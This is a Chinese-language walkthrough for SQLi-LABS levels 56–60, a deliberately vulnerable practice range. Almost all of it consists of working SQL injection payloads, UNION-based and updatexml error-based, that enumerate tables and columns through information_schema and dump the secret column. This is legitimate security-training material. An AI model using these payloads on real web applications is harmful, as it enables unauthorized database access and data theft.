SQLi-LABS靶场56-60通过攻略

less-56

1.判断注入点

?id=1' 页面不正常

2.判断闭合方式

?id=1') --+ 可以闭合成功

3.查看页面回显点

?id=-1')%20 union select 1,2,3--+

4.查询数据库名

?id=-1')%20 union select 1,database(),3--+

5.查询所有表

?id=-1')%20 union select 1,(select table_name from information_schema.tables where table_schema='challenges'),3--+

6.查询表的所有字段

?id=-1')%20 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='43kcrdhm86'),3--+

7.查询payload

?id=-1')%20 union select 1,(select group_concat(secret_N2VJ) from 43kcrdhm86),3--+

提交即可

less-57

这一关同上一关一样 只是闭合方式不同 这一关的闭合方式是双引号闭合

less-58

1.判断闭合方式

单引号可以闭合成功

2.查询数据库名

使用报错注入查询

?id=1' and updatexml(1,concat(1,database()),1)--+

3.查询所有表

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+

4.查询表的所有字段

?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='oku1ceqf6n')),1)--+

5.查询payload

?id=1' and updatexml(1,concat(1,(select group_concat(secret_M0T5) from oku1ceqf6n)),1)--+

提交即可

less-59

这一关同上一关一样使用报错注入 不同的是这一关是数字型注入 闭合方式为整数型

less-60

1.判断闭合方式

?id=1") --+  闭合方式为双引号加括号

2.查询数据库的所有表

因为题目中以及给了数据库 所有直接查表即可

?id=1") and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+

3.查询表的所有字段

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='cxnzzdty'),0x7e),1)--+

4.查询payload

?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_MB6W) from cxnzzdty),0x7e),1)--+’